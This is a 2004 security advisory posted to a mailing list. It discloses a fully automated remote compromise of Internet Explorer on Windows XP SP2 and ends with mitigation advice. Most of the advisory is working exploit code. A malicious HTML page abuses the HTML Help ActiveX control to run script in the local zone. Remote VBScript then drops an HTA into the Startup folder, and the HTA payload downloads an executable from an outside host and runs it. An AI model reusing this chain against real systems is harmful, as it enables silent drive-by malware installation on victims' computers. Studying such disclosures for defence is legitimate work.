<<< Date Index >>>     <<< Thread Index >>>

Microsoft Internet Explorer SP2 Fully Automated Remote Compromise




Microsoft Internet Explorer SP2 Fully Automated Remote Compromise

Dec, 21 2004


Vulnerable
----------
- Microsoft Internet Explorer 6.0
- Microsoft Windows XP Pro SP2
- Microsoft Windows XP Home SP2


Not Tested
------------------------
- Microsoft Windows 98
- Microsoft Internet Explorer 5.x
- Microsoft Windows 2003 Server

 

Severity
---------
Critical - Remote code execution, no user intervention


Intro
------
Although hundreds of millions of dollars have been spent on securing SP2, 
perfection is impossible. Through the joint effort of Michael Evanchik 
(http://www.michaelevanchik.com) and Paul from Greyhats Security 
(http://greyhats.cjb.net), a very critical vulnerability has been developed 
that can compromise a user's system without the need for user interaction 
besides visiting the malicious page. The vulnerability is not actually a 
vulnerability in itself, but rather it is uses multiple known holes in SP2 
including Help ActiveX Control Related Topics Zone Security Bypass 
Vulnerability and Help ActiveX Control Related Topics Cross Site Scripting 
Vulnerability. 


Tech Stuff and Explanation
--------------------------

1. Create a webpage with the following code:

sp2rc.htm
---------------------------------------------------------------------
&lt;OBJECT id="localpage" type="application/x-oleobject" 
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
style="position:absolute;top:140;left:72;z-index:100;" 
codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" 
value="command;file://C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm">
&lt;/OBJECT&gt;

&lt;OBJECT id="inject" type="application/x-oleobject" 
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
style="position:absolute;top:140;left:72;z-index:100;" 
codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" 
value='command;javascript:execScript("document.write(\"&lt;script 
language=\\\"vbscript\\\" 
src=\\\"http://freehost07.websamba.com/greyhats/writehta.txt\\\"\"+String.fromCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>
&lt;/OBJECT&gt;

&lt;script&gt;
localpage.HHClick();
setTimeout("inject.HHClick()",100);
&lt;/script&gt;
---------------------------------------------------------------------

Explanation of above code:
The first object (id: localpage) tells hhctrl.ocx to open a help popup window 
to the location C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm. This file 
was chosen because it is treated as the local zone and it doesn't have any 
script to mess us up. On some computers an error is shown before the popup. 
This is the user's only chance to prevent the vulnerability from working. If 
the user were to force his computer to shut down at this point, the user would 
be unaffected by the exploit.

The second object (id: inject) tells the help popup to navigate to a javascript 
protocol, which executes. Thus, cross site scripting has just taken place. A 
script tag that uses a remote file is written to the page, and writehta.txt 
(below) is executed in the unsecured local zone.

In the script, HHClick is able to be used to automate the vulnerability. This 
is more effective than the previously described method of requiring a user to 
click on a button.


2. Writehta.txt uses adodb recordset to write Microsoft Office.hta to the 
user's startup folder. See Michael Evanchik's analysis of the drag and drop 
vulnerability for an explanation on adodb recordset.

writehta.txt
---------------------------------------------------------------------
Dim Conn, rs
Set Conn = CreateObject("ADODB.Connection")
Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _
"Dbq=http://www.malware.com;"; & _
"Extensions=asc,csv,tab,txt;" & _
"Persist Security Info=False"
Dim sql
sql = "SELECT * from foobar.txt"
set rs = conn.execute(sql)
set rs =CreateObject("ADODB.recordset")
rs.Open "SELECT * from foobar.txt", conn
rs.Save "C:\Documents and Settings\All Users\Start 
Menu\Programs\Startup\Microsoft Office.hta", adPersistXML
rs.close
conn.close
window.close
---------------------------------------------------------------------


3. f00bar.txt (thanks malware for hosting this file) is the file requested by 
the adodb recordset (again, read the drag and drop analysis at 
www.michaelevanchik.com for an explanation on how this works and why the the 
f00bar.txt looks like it does). Because there is absolutely no limit on what 
you can do in an hta file, an old, yet effective method of requesting and 
saving a file to the user's hd is used. From that, a wscript shell is created 
and used to run the program. And now, ladies and gentlemen, we have compromised 
the user's machine.

f00bar.txt
---------------------------------------------------------------------
"meaning less shit i had to put here"
"&lt;script language=vbscript> crap = """
""": on error resume next: crap = """
""" : set o = CreateObject(""msxml2.XMLHTTP"") : crap="""
""" : o.open 
""GET"",""http://freehost07.websamba.com/greyhats/malware.exe"",False : crap="""
""" : o.send : crap="""
""" : set s = createobject(""adodb.stream"") : crap="""
""" : s.type=1 : crap="""
""" : s.open : crap="""
""" : s.write o.responseBody : crap="""
""" : s.savetofile ""C:\malware.exe"",2 : crap="""
""" : Set ws = CreateObject(""WScript.Shell"") : crap="""
""" : ws.Run ""C:\malware.exe"", 3, FALSE : crap="""
"""&lt;/script&gt; crap="""
---------------------------------------------------------------------


4.  Upload hhtctrl.ocx for the computers that don?t happen to have this 
control.  All XP's seem to have this by default, some win2k3's do not 
(according to Michael Evanchik)


Proof of Concept?
------------------
- http://freehost07.websamba.com/greyhats/sp2rc.htm

- If an error is shown, press OK. This is normal.

- Notice in your startup menu a new file called Microsoft Office.hta. When run, 
this file will download and launch a harmless executable (which includes a 
pretty neat fire animation) 

 

Vendor Recommendations
----------------------
- Like Michael Evanchik said in his previous analysis, Microsoft needs to apply 
XP Service Pack 2's local zone lockdown to .HTA files as well.

- This might be a little farfetched, but it would solve a lot of problems: Take 
out the startup folder and only support running files during startup through 
the registry. The startup folder is a major part of this vulnerability and I 
can almost gaurantee it will be used for another remote compromise.

- Microsoft could possibly take HTA files out altogether. I have not seen them 
used for anything beyond hacking.

- No vulnerability is too small or too insignificant to be taken seriously. 
Treat every vulnerability as if it could be dangerous. 

 

User Recommendations
---------------------
- Disable hta files.
- Get yourself antivirus software. I recommend symantic because once they get 
their lazy asses off the couch and fix some of this stuff you will be a lot 
better off.
- Disable active scripting in Internet Explorer. If nothing else, do this.
- Do not use Internet Explorer, use Mozilla Firebird (now known as FireFox  
www.mozilla.org)

 

Credit
------
Paul from Greyhats
Michael Evanchik
Http equiv (thanks for allowing me to use your server for f00bar.txt)


Greets
------
- Liu Die Yu (all the work you've done is amazing)


Contact
-------
paul@xxxxxxxxxxxxxxxx
http://greyhats.cjb.net
http://michaelevanchik.com